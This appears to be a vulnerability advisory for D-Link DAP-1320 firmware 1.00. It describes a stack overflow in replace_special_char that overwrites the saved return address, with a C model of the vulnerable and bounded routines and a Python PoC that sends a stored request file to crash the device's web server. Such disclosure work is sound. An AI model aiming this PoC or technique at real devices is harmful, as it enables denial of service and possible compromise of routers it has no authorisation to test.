Overview

| Firmware Name | Firmware Version | Download Link |
| --- | --- | --- |
| DAP-1320 | 1.00 | https://legacyfiles.us.dlink.com/DAP-1320/REVA/FIRMWARE/DAP-1320_REVA_FIRMWARE_1.00.ZIP |

Vulnerability details

1. Vulnerability Trigger Location

The vulnerability is triggered at the return point of the replace_special_char function: the saved return address that the function epilogue restores into the MIPS ra register has been overwritten on the stack, so the closing jr ra transfers control to the overwritten value instead of returning to the caller.

[image]
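As an added illustration of the bug class described above (this is not the DAP-1320 firmware's own code, whose source is not on this page), the following C models a replace_special_char-style routine that expands special characters into a fixed-size stack buffer. The 32-byte buffer, the &amp;/&lt;/&gt;/&quot; expansion table and the function names are assumptions chosen for the example. overflow_bytes() measures how far a short input grows past the buffer (and therefore into the caller's saved return address), and replace_special_char_safe shows the bounded form that refuses input which does not fit.

```c
/* Added example modelling a replace_special_char-style routine.
 * NOT the DAP-1320 firmware's code: the buffer size (32), the expansion
 * table and the function names are assumptions for illustration. */
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define OUT_BUF 32

/* Replacement text for one input byte (assumed table), or NULL when the
 * byte is copied through unchanged. */
static const char *expansion(unsigned char c)
{
    switch (c) {
    case '&': return "&amp;";
    case '<': return "&lt;";
    case '>': return "&gt;";
    case '"': return "&quot;";
    default:  return NULL;
    }
}

/* Output bytes the routine emits for `in`, including the terminating NUL. */
size_t expanded_len(const char *in)
{
    size_t n = 1; /* NUL */
    for (; *in; in++) {
        const char *r = expansion((unsigned char)*in);
        n += r ? strlen(r) : 1;
    }
    return n;
}

/* Bytes written past the end of the stack buffer for `in`, or 0 if it fits. */
size_t overflow_bytes(const char *in)
{
    size_t need = expanded_len(in);
    return need > OUT_BUF ? need - OUT_BUF : 0;
}

/* Vulnerable shape: the output buffer is a stack local and nothing checks
 * that the expanded text fits. The caller's saved return address sits
 * above the locals, so an over-long input rewrites the slot that is later
 * reloaded into ra. Only safe to call when overflow_bytes(in) == 0; the
 * overrun itself is measured, not executed, because it is undefined
 * behaviour on the host. */
void replace_special_char_vuln(const char *in, char *out_copy, size_t copy_cap)
{
    char out[OUT_BUF];
    char *p = out;
    for (; *in; in++) {
        const char *r = expansion((unsigned char)*in);
        if (r) { size_t l = strlen(r); memcpy(p, r, l); p += l; }
        else     *p++ = *in;
    }
    *p = '\0';
    snprintf(out_copy, copy_cap, "%s", out);
}

/* Hardened shape: every write is bounded by `cap`, and a replacement that
 * would not fit is refused rather than partially written.
 * Returns 0 on success, -1 (with an empty string in `out`) when it does not fit. */
int replace_special_char_safe(const char *in, char *out, size_t cap)
{
    size_t used = 0;
    if (cap == 0) return -1;
    for (; *in; in++) {
        const char *r = expansion((unsigned char)*in);
        size_t l = r ? strlen(r) : 1;
        if (used + l + 1 > cap) { out[0] = '\0'; return -1; }
        if (r) memcpy(out + used, r, l); else out[used] = *in;
        used += l;
    }
    out[used] = '\0';
    return 0;
}

int main(void)
{
    char buf[OUT_BUF];
    const char *benign  = "a<b";               /* constructed input */
    const char *hostile = "<<<<<<<<<<<<<<<<";  /* 16 bytes in, 65 bytes out */
    replace_special_char_vuln(benign, buf, sizeof buf);
    printf("vuln: %s\n", buf);
    printf("hostile overruns the buffer by %zu bytes\n", overflow_bytes(hostile));
    printf("safe rc=%d\n", replace_special_char_safe(hostile, buf, sizeof buf));
    return 0;
}
```

The point of the model is the expansion ratio: sixteen input bytes become sixty-five output bytes, so a request that looks far too short to reach the saved return address still overruns a 32-byte frame by 33 bytes. When triaging a crash like the one above, computing expanded_len() for the crashing input against the frame size seen in the disassembly tells you whether the ra overwrite is explained by the expansion alone.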

2. Vulnerability Analysis

[images]

POC

Python script (reads the PoC request saved in the file `id19` and sends it verbatim to the device's web server):

```python
import socket

# Target host and port of the device's HTTP service
host = "127.0.0.1"
port = 80
# PoC request, sent byte-for-byte exactly as stored
file = "id19"
with open(file, "rb") as f:
    request = f.read()

# Create a TCP socket and connect to the web server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)  # a crashed httpd never answers; do not block forever in recv
s.connect((host, port))

# Send the whole request (sendall retries until every byte is written)
s.sendall(request)

# Read the response; a timeout or connection reset here is consistent
# with the service having crashed on the request
try:
    response = s.recv(4096)
    print(response.decode(errors="replace"))
except (socket.timeout, ConnectionResetError) as e:
    print(f"no response: {e}")

# Close the connection
s.close()
```